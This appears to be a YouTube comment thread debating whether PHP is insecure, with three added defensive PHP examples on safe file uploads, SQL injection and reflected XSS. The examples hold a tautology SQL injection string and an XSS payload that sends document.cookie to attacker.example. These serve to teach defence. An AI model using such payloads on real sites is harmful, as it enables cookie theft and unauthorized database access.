Fun fact: 20 or so years ago I got into an argument with DHH in the comments of my blog, specifically about his comparing Rails (a framework) to PHP (a language). This was on a custom blog, written in PHP, hosted on my iMac, from a trailer park.
Based
Wake up babe, new DHH lore just dropped
He did a similar thing a few years ago on Twitter comparing Rails to Node.js 😂
PHP is a language designed for the web, whereas Rails is a framework in an allegedly more readable Perl. Ruby is probably more consistent argument-order-wise, but requires learning sigils and odd control flows. PHP is often just HTML with some dynamic server side code that does everything you need as opposed to yet another template language that doesn't quite.
Given the topic, it sounds like you won automatically
I literally got into an argument with a grad student recently about whether or not PHP was insecure. It was really annoying because I don't even code in PHP but it was really frustrating that someone who is actively studying computer science could have so many misconceptions about the internet. He straight tried to say that websites written with PHP could be taken control of with kali linux. At some point you have to wonder how people get that far in a degree program with such basic misconceptions or no knowledge of what the internet is made of.
#NotAllWebsites And there should be a SQL injection tool in Kali. #NotAllPHP uses prepared statements.
DK effect, baby, but a grad student? Sounds like somebody was spending too much time looking at their grades/writing papers rather than learning anything about the internet lol. That sounds like a nightmare.
No need to argue, just ask him to do it if it's so damn easy.
@@darylphuah I remember when I was starting to learn PHP and I asked my teacher why it is unsecure, he answered:
- just try to invade my website if it is so unsecure.
And then I shut my mouth.
Simply, we can't base ourselves on what random people keep saying about a language or even any subject.
And then I learned that the problem isn't the lang, the problem is those devs that rely on ChatGPT and on Reddit opinions.
I honestly don't think it's that surprising. Academia isn't really designed/equipped to convey that sort of practical industry knowledge. Unless their degree was specifically related to cyber security, they're unlikely to have had any direct experience with either offensive or defensive security practices.
Personally just got into PHP for the job prospects in my local area. Mostly WordPress stuff but I've been learning Laravel to dip into Full-Stack and I can say that I'm starting to love Laravel just by how easy it is to build features, and from how good the documentation is.
I’m thinking about picking up Laravel. What are some good learning resources?
@@semyaza555 Not OP, but a somewhat regular Laravel developer. The documentation is incredibly good and full of examples. If you like a more hands-on approach, look for Laracasts; it's a paid resource but with a lot of free content you can pick up and study.
@@semyaza555 check out Laracasts. There are tons of tutorials there including a from-scratch series.
docs
Laracasts !
One of the problems that leads to this type of argument is that for many people PHP and WordPress are synonymous.
Even so, does either prevent rawdogging SQL or equating random types like a secure framework might at least warn you for?
There's... a lot of problems with PHP, and especially wordpress. The foundational security is not really one of them, until you start getting into wordpress plugins. But the architecture of wordpress just... sucks. Wholesale, it's terrible. The language sucks, wordpress sucks, I hate having to deal with it when I get a contract job dealing in PHP.
@@nZifnab skill issue
@@nZifnab PHP is ok. WordPress on the other hand is not that great. Biggest con is that they don't have a templating engine to this day, so HTML is mixed with PHP everywhere.
@@nZifnab you're just too lazy and can't read about WordPress API
You never heard this? How young are you that you can't remember a time where PHP just spit any query parameters out as global variables, potentially overwriting things like $isadmin. Also the insanity of string tainting. And multiple SQL escaping functions until they finally got it right. It's all fixed now, but that was the state at some point.
yeah, and he doesn't blame the tool xDD. If the tool (PHP) is perfect, then why are they updating it?
To be fair. PDO has prepared statements for almost 2 decades now, ppl just didn't use it.
@@nimmneun Yes, only two decades, i.e. a very recent feature. 😄 (I'm old. 😭)
The register_globals era, although it was disabled by default two decades ago and its usage was actively discouraged all over the place before being completely removed, still bit a lot of folks in the 2000s who insisted on using it.
Doesn't matter if it had that behavior, no one made you store your own important global variables there.
Would love a deep dive on Symfony or a comparison of it to Laravel. A different approach than Laravel and my preferred PHP Framework.
You prefer it, so why is Symfony better than Laravel?
@@CTimmerman we have to ask EU payment processors about that
@@yamix-tr Why? Don't those offer their secure API to anyone who pays for an account?
I agree with the point about PHP being used for examples. A lot of the simplest exploits you run into when you start getting into CTFs/learning cyber-security involve dropping a PHP reverse shell on a server. While I am sure PHP can be secure, it is the first thing I look for when 'recreational hacking' since despite being an amateur I know a few common ways to take advantage of PHP. I think that the beginner friendly nature of these exploits makes it easy to say 'PHP is insecure' even if Wordpress is the only place some of the underlying configuration issues are likely to show up.
As PHP and WordPress are so easy to use, they're quite popular, and thus a more likely target to exploit for monetary gain. More popularity also means more code/bugs.
How would you run your shell on a server set up correctly?
@@Ford-ju9yr If it is set up correctly I would not be able to, hence PHP can be secure. Based on my limited understanding, the major concern for any language is any place where user input can be processed by the server. So: don't upload user files into a directory where PHP might evaluate them (even if you think you are only allowing JPEGs or other safe file types, there can be ways to bypass such filters); make sure you are not evaluating anything coming back from the browser (cookies, query parameters from the URL); make sure that 3rd party code on the server is up to date... You know, the basic stuff.
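The two upload rules from the reply above (never let the interpreter see the uploaded bytes, and never trust the client's filename or the filter that inspects it) as an added example; this is not code from the video, the article, or any framework mentioned in the thread. The storage directory, the route names in the trailing comment, the 5 MB cap and the image-only allow list are assumptions.

```php
<?php
declare(strict_types=1);

// Allowed types keyed by the MIME type sniffed from the file's bytes, not by the
// client's filename extension or the browser-supplied $_FILES[...]['type'].
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Stores one uploaded image under $storageDir and returns the generated name.
 * $file is one entry of $_FILES. $storageDir is assumed to be OUTSIDE the
 * document root (e.g. /var/app/storage/uploads, not /var/www/html/uploads),
 * so no URL maps to it and PHP is never asked to execute anything in it.
 */
function storeUploadedImage(array $file, string $storageDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed, code ' . (int) ($file['error'] ?? -1));
    }
    // Only accept a path that PHP itself created for this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > 5 * 1024 * 1024) {   // assumed limit
        throw new RuntimeException('file too large');
    }
    // Sniff the content. A polyglot that still passes this check is harmless
    // here because the stored copy is never in an interpreted location.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']) ?: 'unknown';
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('unsupported content type ' . $mime);
    }
    // The stored name is generated here; "shell.php.jpg" style double
    // extensions never reach the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($storageDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move upload');
    }
    chmod($dest, 0640);   // readable by the app user, never executable
    return $name;
}

/**
 * Serves a stored image back. Because the file is outside the web root, the
 * only way to reach it is through this handler, which re-validates the name
 * (no traversal, no foreign extension) and sets an explicit content type.
 */
function serveUploadedImage(string $storageDir, string $name): void
{
    if (!preg_match('/\A[0-9a-f]{32}\.(jpg|png|gif)\z/', $name)) {
        http_response_code(404);
        return;
    }
    $path = rtrim($storageDir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($path));
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Request wiring (hypothetical routes, STORAGE_DIR assumed to be defined):
//   POST /upload       -> storeUploadedImage($_FILES['image'], STORAGE_DIR)
//   GET  /img/{name}   -> serveUploadedImage(STORAGE_DIR, $name)
```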
They can say anything about PHP, but most Linux distros have a page on their wiki dedicated to PHP because it is the fastest way to set up your server and run a website; you just need to upload the PHP files to the server and use Composer for dependencies if you need.
Nowadays I don't think this is really true.
Most modern languages have an http library as part of stdlib that lets you define handlers + has standard file handlers. In golang setting up an http project to respond to most requests serving from a static directory and some special handlers interacting with a db is 15 lines and that's a lower level example. Python doesn't have it in stdlib, but setting up the same thing with common frameworks is 10 lines or similar, and both of those have package managers that handle dependencies for you.
@@metznoah In php you don't need to write code to handle serve page via http. Let apache handle that. Php is still easier.
@@metznoah you could do the same in PHP since version 4, long before Golang existed.
@@metznoah Python doesn't have it in stdlib? python -m http.server
Laravel dev here and I can say that most use cases can be solved with PHP / Laravel.
I haven't seen (correct me if I am wrong) another framework with so many features out of the box and a really good doc like Laravel.
We get security patches regularly and we even have tools like Laravel shift to upgrade our projects within the time of fetching a coffee.
The ecosystem around PHP and Laravel is HUGE (Pest, Inertia, Livewire, Octane, Forge, Tinker, Herd, ...).
Performance is OK for the majority of apps.
Even some native tools are coming to life like PHP Native.
Of course PHP is not the most popular language in the world, but does it mean that it is bad? No.
Personally I think most people remember PHP like it was before 7 and I really think that a lot of people would love it if they would give it another chance.
Laravel is great, but it is missing quite a bit of functionality that has to be provided by packages. Nested sets are a great example of something that should just be part of the framework.
Depends how you want to count; there was a reason ASP was mentioned as part of the .NET ecosystem. You also have Blazor for the front end and MAUI for mobile + the NuGet libraries. You can pack all this in one solution for your product, otherwise said: pages, server, mobile app for Android and iOS, custom libraries, admin tools all written in one language, only some XML variant (HTML) which you have with other languages anyway too.
@@KingSvenDeluxe what exactly is it missing? Its slogan was something along the lines of "batteries included, but replaceable". Additional stuff is provided with their first-party packages for convenience purposes, I would say. Something like role management and others are something that you can whip up yourself with relative ease. It's just that since you started doing it yourself, you maybe think to yourself "well, maybe this Spatie package provides me with all that I need and more, I feel kinda lazy writing this... fine, I'll install that package".
They shouldn't really put everything under the sun into the framework, it will become bloated.
@@ward7576 nested sets. Should be in any framework, really.
As someone who has used MERN and now is trying out laravel, I can say it has a lot of features out of the box, is easy to use, and the way it forces an architecture on you can be a good point.
But its tooling is quite lacking, especially in VS Code, and for a language that (now) has (basic) types built in beside phpdoc, it sure isn't benefiting from them as much as something like TypeScript does. I've also had to set up phpstan beside intelephense to lint the code, and both of those don't agree on which methods exist on which classes, and it's quite a mess.
Some things can be quite annoying as well. Like for example, the built in session authentication will not set sameSite to none because it's overridden by some package. Or setting up uuids for all tables requires too much of a workaround. Or the fact that multi table token authentication almost killed me to implement, and I still don't know how to make sense of the way it works since there are several ways to handle auth and it isn't clear in the docs how it all works.
A great framework, but there's also something to be said for a minimal do-it-yourself approach.
(Disclaimer: I'm not through the whole video yet.)
PHP is used pretty often in CTFs showing vulnerabilities. That may be one reason people think it's more vulnerable. Also to the point: if most people are trained on one language's exploits, doesn't that mean that language is more likely to be exploited, making it... more vulnerable...
From what I know of CTFs, usually the PHP vulnerabilities are ones that you could run into with any other language. It's just easier to execute and showcase in PHP.
Things such as serialization/unserialization, RCE via shell injection due to the code taking unsanitized user input and slapping it into an exec() statement, SQL injection via unsanitized user input.
PHP allows easy access to these foot guns. But you have to go out of your way to actually put bullets into the guns. I.E. take untrusted user input and put it into something that it should never be put into under any circumstance.
As such, no. Because it is not a PHP specific thing you're exploiting. But rather intentionally poorly written code that you are exploiting. It does not make anyone else's PHP instance more or less vulnerable. You are chasing after a concept in the CTFs. Not something specific to PHP. Node can do serialization/deserialization of objects. You can shell inject or SQL inject in Python.
I remember about 11 years ago when I discovered PHP and I was mesmerised by how easy it was to develop dynamic web applications by just pasting some PHP code in the HTML, which was a breath of fresh air compared to Java at the time. Even back then the topic of "PHP is vulnerable" was quite popular, but I agree that it's the devs who make vulnerabilities, not the language.
In my time 90% of the issues were MySQL related because for whatever reason, most devs didn't use prepared statements even though every guide only explained MySQL connections with prepared statements. Really weird.
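The gap the comment above describes (PDO has had prepared statements for years; people concatenated anyway), shown side by side as an added example that is not from the video or the article. The table and the two inputs are constructed here in an in-memory SQLite database so it runs offline; against MySQL you would additionally set PDO::ATTR_EMULATE_PREPARES to false so the server, not the driver, does the binding.

```php
<?php
declare(strict_types=1);

// Constructed demo database: two users, one of them privileged.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);
// For MySQL also: $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, is_admin INTEGER NOT NULL)');
$db->exec("INSERT INTO users (name, is_admin) VALUES ('alice', 1), ('bob', 0)");

// The "raw dog" pattern from the thread: the value is spliced into the SQL
// text, so the database parses it as part of the query, not as data.
function findUserUnsafe(PDO $db, string $name): array
{
    $sql = "SELECT id, name, is_admin FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll();
}

// Prepared statement: the query shape is fixed first, the value is bound
// afterwards and can only ever be compared as a name.
function findUserSafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name, is_admin FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll();
}

// Two constructed inputs: a legitimate name containing a quote, and the
// classic tautology. The unsafe variant breaks on the first (SQL syntax
// error) and returns every user on the second; the safe variant simply
// finds no user named like that in either case.
foreach (["O'Brien", "' OR 1=1 --"] as $input) {
    $label = json_encode($input);
    try {
        $rows = findUserUnsafe($db, $input);
        printf("unsafe %-16s -> %d row(s)\n", $label, count($rows));
    } catch (PDOException $e) {
        printf("unsafe %-16s -> SQL error: %s\n", $label, $e->getMessage());
    }
    $rows = findUserSafe($db, $input);
    printf("safe   %-16s -> %d row(s)\n", $label, count($rows));
}
```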
I think it's also part of the language design, programming conventions and patterns back then. As stated in the blog, back then, the zeitgeist leaned more onto the ease of use and approachability towards new developers (PHP, Java, JS, VisualBasic, etc.), not with safety and correctness we see highlighted a lot nowadays.
I wish we'd prefer the term unsecure over insecure. Unsecure definitely means a security risk, and not that the language has confidence and self-esteem issues.
unsecure means the application wasn’t designed to be secure, insecure means it has flaws despite intending to be secure
I am a professional web dev and we use php 8.2 ... it's almost as if you're writing C# or Java when you use strict typing (literally a php feature these days)
PHP has had a major glow up over the past decade or so
PHP is extremely insecure. I have seen thousands of hacked websites and thousands of vulnerabilities that should not exist.
I believe a language/framework is supposed to provide safety nets from common pitfalls.
Few examples:
in_array is not reliable up to 7.4
Most XSS vulnerabilities are there because PHP does not escape things by default like ERB in Rails, for example.
And 100 other reasons...
PHP is the Nickelback of programming languages
As a pentester, I've found vulnerabilities in PHP applications at a higher rate than other languages.
Which does not say anything about PHP but rather about the PHP developers who most likely use vanilla PHP and have no idea what they are doing. (Also as mentioned in the video, most websites run on PHP so obviously most vulnerable websites will also be written in PHP)
Probably testing legacy code
"You can't tell it's PHP code unless you see the extension." IDK what he means by that, but the dollar signs in front of all the variables is a pretty good sign I'm in PHP-land. That or Bash, and I'm not sure which is worse.
Also, "only a bad craftsman blames his tools" is just factually untrue. Only a bad craftsman blames his tools _for bad work,_ sure, but good craftsmen will 100% say their tools are bad and blame bad tools for slow and frustrating work. Bad tools are bad tools, and anyone who says "only a bad craftsman blames his tools" are bean counters/cheapskates/managers/old farts who have never used the right tools in the first place and probably don't work anymore (or worse, they've never even done the work in the first place), so they need to shut up and go home. Yes, I'm salty about this, I've heard it far too often back when I was in carpentry. Mostly from old farts who would lead every sentence with "back in my day" when "my day" precluded the existence of hydraulic machinery and widespread electricity.
Back in my day, Windows was a pane installation company.
@@TJackson736 now it's just a pain installation company.
My full stack class in college did 2-4 weeks in php. I thought it was a great introduction. Way less complicated than the end of the class that introduced “The Frameworks”. Seems like a straight forward approach to doing complicated things. I did however not like the global state nature of it. Seemed short sighted.
The language evolved from a toy technology that some guy used to develop his own home page (Personal Home Page). There are a few things that are short sighted due to this legacy.
Indeed you have global state because everything is run in context of one request, so that request is your whole "world". But I don't think that's an issue really.
If you mean global variables and other stuff which is practically global (service containers in frameworks etc) then it's optional and mostly discouraged. Still, you can do a ton of weird stuff in PHP and make extremely hard to understand code.
As a full time php dev, I can say it is an okay language. Security is no issue and the language has become much more developer friendly and oop-rich since PHP 7.0 release in 2015. I still would not generally recommend the language, because it is only useful for backend. A lot of languages can do backend, and at the same time be used as command tools, frontend and non-web related stuff.
One of my major issues with PHP is that it's a script language. It runs the script then stops. That's great for simple websites, but the moment you need to do something like keeping track of the amount of requests you're doing for rate limiting, you need something external to keep track of it.
With any other language that doesn't stop running once a request has been processed, that problem is fairly trivial. While it can obviously be trivial in PHP as well, there's just a lot more to it.
I think it's really nice because of the simplicity and PHP 8.2 has introduced some really nice toys to play with, but I'd still pick most other languages over it.
php can be used for non “web stuff”
it can, but it sucks there @@aiamfree
@@CottidaeSEA I'd argue that if you're rate limiting you need something external to keep up with it anyway. Companies are going to ask why they're being rate limited, etc.
Not only that, in the case of a crash/reboot you'd ideally want your limits to be cached & reloaded upon reboot.
@@Microtardz That could be done through a database. Also, the throttling isn't enforced in our system, it's adhered to, the external system has a request limit so we need to ensure we don't break it. As such, throttling can be necessary and in certain cases with fine-grained control if some requests are more important than others.
All of which could've been done through PHP and a database if it didn't shut down after request completion.
There is stuff like OpenSwoole which actually keeps everything running, but that also requires a fundamental change to session management.
I would say PHP is vulnerable because there are 7800+ CVEs against PHP, where Rails has 193. In both cases, these are applications built on the language.
Given GitHub and Spotify are Rails applications and Spotify handles 10% of e-commerce during Xmas, they must be secure.
Did you mean Shopify?
Case in point, comparing a language with a framework.
Full Stack Laravel Dev pays well.
JS, PHP, Python all suck because they're scripting languages.
Their worst feature is lots of outdated advice.
Magic quotes were removed in PHP 5.4, but 0 is still equal to "on".
bro if you thought early php was wacky let me tell you about this language called JavaScript
@@furycorp In JavaScript, 0 != "on", but a 1000+ line chess program does get unwieldy with implicit types.
I'm really wondering why you are trashing Joomla here. From the myriad of PHP CMS, Joomla probably is the most solid one out there. Especially comparing to the "market leader"...
Good joke. Joomla.....lol Here's another joke...Drupal.
@@complexity5545 do you have arguments?
I don't mean that sarcastically. Joomla has flaws, but the flaws I mean are rather minor, and from past discussions it always turned out that people's opinions were formed by experiences from 15 years ago, while they were always astonished by what Joomla does, especially compared to WordPress.
Back in the day, PHP's brilliant ideas on how to secure applications would instill me with confidence. "There's no way these guys don't know what they're doing", I'd think.
00:37 I think from that, $_GET can contain array values (from a query string like "a[]=1&a[]=2") but the PHP author assumed that values can only be strings
There is no mention of syntax like "a[]=1&a[]=2" in the $_GET documentation btw
edit: there is, but in the "Variables From External Sources" page
The page about $_GET is in line with all other pages about superglobals, explaining their general content. GET, POST and REQUEST all link to "Variables from external sources", where the general concept of receiving data is explained (no use to maintain copies of that on all three previous pages if you can link to a "see also" page instead), and has both an example and a link to the FAQ page where this topic is also discussed.
It is admittedly a challenge to find the correct search terms to find the page you need explaining the thing you struggle with - the PHP documentation is still quite good.
If I had a $ for every time prime said PHP...I'd have a PHP file
10:00 dr disrespect = the primeagen confirmed
What a great summary at the end ❤
The php hammer is definitely a murder device
Zizek’s subconscious unknown knowns on dev stream
2023 vibe shift is crazy
PHP encourages writing insecure code by its very design. And the article pretty much says "yeah, so there are foot guns lying around, but you're not necessarily forced to use them". Well, my brother in Ch, if they are lying around, someone's going to use them. They cannot be removed precisely for the reason that someone IS actually using them. If these were simply legacy features nobody uses, they would have been deprecated by now and removed.
PHP is great. 90% of all of those who complain about its vulnerability never touched it.
People complain about other things once they've touched it though.
I complain because it powers Wordpress and without exception every WP site ive ever interacted with in the last 15 years seems to suck.
@@CamembertDave You don't touch PHP, PHP touches you.
A lot of them used it 10+ years ago and they don't realise that things have happened since then.
And thank God.
I am in a position to know that a lot of less experienced devs write important code. PHP suffers from bad press, I get that, but that doesn't change the fact that when you go to learn it you are essentially taught to raw dog PHP, at least that was the case for me. What PHP needs is a wave of new up-to-date tutorials on how to write it properly. No, setting up WordPress is not a PHP tutorial, and most people get it wrong.
@ProgramWithGio has a great series "Learn PHP the right way" that really does teach fundamentals and doing things correctly.
@@sadaros95 we need more of that.
Laracasts had their 10year anniversary this year. Best way to learn php since day 1
@@sadaros95 Yes, I'm actually going through that as well as Laracasts
What drove me away from PHP, really, was how laser-focused it is on web development (maybe this has changed, please correct me if I'm wrong). This is not a bad thing, especially today, but I prefer languages with wider use cases. By the way, when I saw Laravel for the first time I was mind-blown, such a good framework; every need of web development under the sun is probably implemented and well maintained in that framework.
Ok, I need to counter the "a poor worker blames his tools" point from the article. The point of that saying isn't that bad tools don't exist, or that a good worker will be able to do good things with bad tools - it's that a good worker will ensure they have appropriate tools.
In this context, that means the proverbial good worker will try out PHP, see the problems, then find something better, while the proverbial bad worker will try out PHP, see the problems, then just keep using it anyway because they're too lazy to learn a new tool, probably ending up in denial about it and making cope-posts online about how all the PHP hate is unjustified.
Or maybe PHP isn't a bad tool. Either way, don't use that saying as a counter to criticism of a tool, because it's not.
I am toying with the idea of writing a full blog post about this because this argument comes up over and over.
It drives me nuts when people say stuff like "well, all languages have flaws"... quietly disregarding the fact that PHP has more/bigger flaws. It leads to this implication that there is no such thing as quality in programming languages, which is just not true. The very fact that each release to a language adds/deprecates features suggests that they want to move closer to perceived perfection.
TLDR your comment is spot on.
Ding ding ding!
Learn the best security practices from the beginning when handling databases with PHP and you're pretty much good. PHP is up to snuff when it comes to security these days. Really have had zero problems utilizing AWS EC2 (running LAMP stack) + Secret manager. Shits pretty secure, would recommend.
It’s even nicer that we don’t have to ask Stack Overflow or Reddit our questions anymore, since none of those people are capable of contributing to the benefit of themselves or humanity, anyway. ChatGPT understands PHP infinitely better than anyone on literally any modern forum just about ever.
Can’t see one nearly invisible error? Just ask Chat and the fix is nearly immediate on the first question. T_T
Thanks to the sheer amount of knowledge on the Internet about PHP, ChatGPT is indeed the best developer 😂
@@keremardicli4013 ALTHOUGH, it is rough around the edges on new PHP releases. Otherwise it is awesome! ^_^
Wait wtf was the part where the like button ran some animation when Prime said "press the like button" at 0:06?
you answered your own question "when prime said press the like button"
One of my favorite things with .htaccess files was giving PHP pages weird extensions and URLs. Miss those days...
0:16 yes, because hakluke is a security person, so he hears this a lot in security circles.
PHP itself isn't *that* insecure--but the devs who use it certainly are😁
13:45 No, it isn't the same thing.
Uninformed just means that somebody doesn't know about something.
Ignorant is worse, people who are ignorant about some things actively don't want to know about it and refuse to change their opinion even if faced with the contrary.
"Unknown knowns" is one of the most interesting ways I've heard of understanding cultural bias.
My professor almost flunked my FYP because I used Laravel, cuz PHP is insecure………. I explained to him how SSR and the framework have gates to stop the known vulnerabilities he noted. And he still wanted to flunk me, even though the main code bits are not in the web site of things, it's just for me to host the application…
The PHP interpreter is implemented in C.
That's all you need to know.
lol I just got put on a project to unravel some legacy code that is in ASP 😂
I am always here for the PHP content
Love that Article, My thoughts exactly.
The only way I see raw PHP being vulnerable is by negligence. PHP is not strongly typed, so if you don't typecheck or typecast your inputs, or forget to sanitize anything, your application becomes vulnerable. A PHP program is only as good as the programmer writing it.
That example takes an unsanitized input "$_GET" and pumps it straight into an unsanitized output "echo". What do these people, complaining about security, expect? PHP does what you tell it to do.
It's the same as with HTMX and people complaining about it making XSS possible.
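The `$_GET` straight into `echo` pattern the comment above describes, as an added example that is not code from the video or from anyone in this thread. It runs from the CLI with a constructed query-string value, shows the reflected XSS, and puts the escaped version beside it. The function names and the attacker URL are made up for illustration.

```php
<?php
// Added example (not from the video or the thread): unsanitized $_GET -> echo
// is reflected XSS; the fix is output escaping for the HTML context.

declare(strict_types=1);

// Constructed sample input standing in for ?name=... in the query string.
$_GET['name'] = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable: user input is concatenated straight into HTML.
function greetUnsafe(string $name): string
{
    return "<p>Hello, " . $name . "</p>";
}

// Hardened: escape for the HTML text context before output.
// ENT_QUOTES escapes both quote styles; ENT_SUBSTITUTE avoids returning
// an empty string on invalid UTF-8 (which would silently drop output).
function greetSafe(string $name): string
{
    $escaped = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Hello, " . $escaped . "</p>";
}

// Attribute context: escaping alone does not stop a javascript: URL in an
// href, so restrict the scheme as well and always quote the attribute.
function linkSafe(string $url, string $label): string
{
    if (!preg_match('#^https?://#i', $url)) {
        $url = '#';
    }
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">'
         . htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</a>';
}

echo "Unsafe:\n" . greetUnsafe($_GET['name']) . "\n\n";
echo "Safe:\n"   . greetSafe($_GET['name'])   . "\n\n";
echo "Link:\n"   . linkSafe('javascript:alert(1)', 'click') . "\n";
```

The first output contains the script tag verbatim; the second contains only `&lt;script&gt;...` text the browser will not execute. Escaping is context-specific: the same string needs different treatment inside a JavaScript block or a URL, which is why template engines escape by default and why `echo $_GET[...]` deserves the reaction it gets.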
I recall reading somewhere an analogy of PHP developers being like carpenters with odd tools making misshapen houses and yelling at you because when you open the front door and the back wall falls over, as if it's your fault and not theirs for making a shit house.
That's you.
Good tools make The Right Thing easy and the default, and The Wrong Thing hard, if not impossible. PHP does the exact opposite (and to be fair, in a lot of ways, so does JS), which you've so neatly demonstrated, which is why it gets the ire that it does.
@@BloodEyePact Uhh getting, personal already.
I don't yell at my clients if something breaks. I simply fix it.
You don't need PHP to create a garbage system. To stay with your analogy: if you have multiple carpenters working on the same piece of carpentry, but each one can only work if they have the specific tools they are used to, then things get crowded in the workshop quickly.
I had to work on a Node project once that used Bootstrap, PicoCSS, and Tailwind all glued together with some custom CSS,
All because each previous dev was convinced his/her favorite CSS framework is "the thing" that will make things easier and better, but then they failed to adapt what was already there to their "easier to use" framework.
Keep it simple. You don't need a Hammer factory if all you want to do is put a nail in the Wall.
@@AScribblingTurtle Don't misunderstand, I'm not claiming you yell at your clients, I'm pointing out that you are blaming PHP developers for using the common default way of doing things and those turn out to be extremely dangerous.
PHP is not made any better by the fact that you can create garbage with anything, the issue remains that it makes it easy to make garbage, and hard to make something good, because every feature requires complex, specific boilerplate to make it work the way it ought to have worked in the first place, and the way most people will think it works until they find out the hard way.
Its complexity is not the issue at hand, though it's certainly not its strong suit, just take a look at the size of the "standard" library of thousands of functions with extremely specific behaviors and use cases.
Finally, comparing PHP to browser languages is a bad comparison. Browsers support HTML, CSS and JS, so you're stuck with them unless you want to venture into WASM. PHP is server side, you made a conscious choice to use garbage. The choice to use PHP over just about any other language for new projects is negligence.
@@BloodEyePact Many PHP "standard" features stem from core extensions that you can install or uninstall as you please, to save on loading times, etc. At least they are a standardized source. What do Node, Go and Rust have, for example? A package ecosystem that is filled with dozens of packages that do the same thing. Some of which seem to work as intended until you hit an edge case and find out the hard way that they don't.
(And before you mention it. I'm not a huge fan of composer, either. It just brings the flaws of a dependency-based package system like NPM to a language that does not need them. IMO)
I agree with your sentiment about complexity not being PHP's strong suit.
Use the right tool for the right job. You don't use PHP if you need highly responsive applications.
Just as you don't hammer a nail with a Screwdriver.
And finally, if I can't compare the structure of a Client- to a Server application, let's take a Server-side Example instead.
A few years back I had to work on a Node server that used the 'mongodb', 'mongoose', and 'mongojs' packages all to connect to the same MongoDB, within the same project.
It is easy to create garbage in any language. The Handholding that many younger Devs expect a language to do is ridiculous. The goal of the software is UX, not DX. PHP is a scripting language.
All that Handholding costs valuable running time on EVERY call, just so the dev doesn't have to think ONCE about what he/she writes.
You say it should work like people "think" it does?
What happened to "learning your tools"?
Finding out "the hard way", that something does not work is called learning.
"Uhhh, I don't want to learn, I went through a 2 Week bootcamp and now I just want to write code I think is correct and grab a quick paycheck. memememe."
@@BloodEyePact nothing really comes close to PHP when it comes to shipping a server side solution. Most of the "problematic defaults" have been addressed for about 10 years. If you're stuck in that time.. that's your problem.
Other "pro" languages like C/C++ give you an even bigger gun to shoot your foot with. So using that as an argument doesn't really make sense.
`real_escape_string` is saying all you need to know
Gotta switch to php to buy my dream lambo i guess
Sometimes it seems like JS is the kid everybody is talking about how great it is while it tries to hide its flaws while PHP is just doing its thing in the background.
My friend works at a security company that probes for the various technologies used by vendors. Insecure and out of date PHP applications are still the majority of insecure and out of date applications out there.
You said it right there with "insecure and out of date". Its longevity means there are apps that run but no dev has touched them in forever. Similar story with many Windows exe's. Nothing to do with PHP IMHO other than its been around a long time and happens to power more sites on the web than anything else.
A woman once told me she thought I was insecure. I had to terminate her process.
I know it's (old?) php when the page I'm visiting is displaying an error message telling me the database is down.
Infosec guy here.
PHP is typically considered insecure not because it's a bad language or insecure because of libraries or anything like that.
Generally it's the same as any other language, but PHP is generally more annoying to update to newer versions.
Maintaining php is very annoying and often a nominal upgrade means a ton of work in testing.
There are managed PHP hosts and deprecation warnings are logged before features like magic quotes are removed in the next version. Tests should be automated anyway, because the website probably changes more often than there are mandatory upgrades to a new backwards-incompatible version.
@@CTimmerman If you see "managed host" you can often think "shared host"
In shared hosting environments companies tend to maintain multiple servers with different versions of PHP on them and move applications to whichever server has the version they need. Unfortunately most people don't maintain their apps and the servers with older versions end up full and the biggest resource hogs.
thankfully these days containerization is making that less a problem. GDPR made shared hosting mostly infeasible in the eu.
That said, the fact that "hosted php" is a feature demonstrates the pain of maintaining php.
@@MrVampify It's not a pain, just a hassle similar to delivering your own pizza. People pay for convenience.
do you have an example? One of PHP's strongest and most annoying points is its backwards compatibility. In my previous job, we updated some legacy PHP5 code (which still had PHP4 syntax in some areas) all the way up to PHP 8.2 in about a month. No issues.
> PHP is generally more annoying to update to newer versions
Harder than what? Node? Updating javascript libraries is a nightmare, and you have to do it all the time because the entire javascript ecosystem is full of critical vulnerabilities every other week. I would know, I get the dependabot alerts for it.
Python? Python 2 to 3 was a literal nightmare.
Java? Oh god please lets not get into jar hell or war files.
ASP? Well you've got me there, I've never used it.
Honestly speaking, I can't think of the last time updating PHP was a pain. Largely because everything was already following best practices such as using typed equality instead of loose equality everywhere.
Going from 5.6 to 8.2 has been virtually painless over the years.
I think the problem stems more from educational content. Find me a file upload tutorial that doesn’t end up putting this new uploaded file into a /accessible/to/the/request/malicious.php
This doesn’t mean PHP is insecure, it is the implementation which a lot of the resource seems to derive from poor educational content and the same people not wanting to understand the same thing in a deeper context.
Frameworks have since made this much simpler by enforcing that public directory and ensuring storage paths are not accessible by URL but then most educational content will start telling you to symlink it to public…. Back at square one again
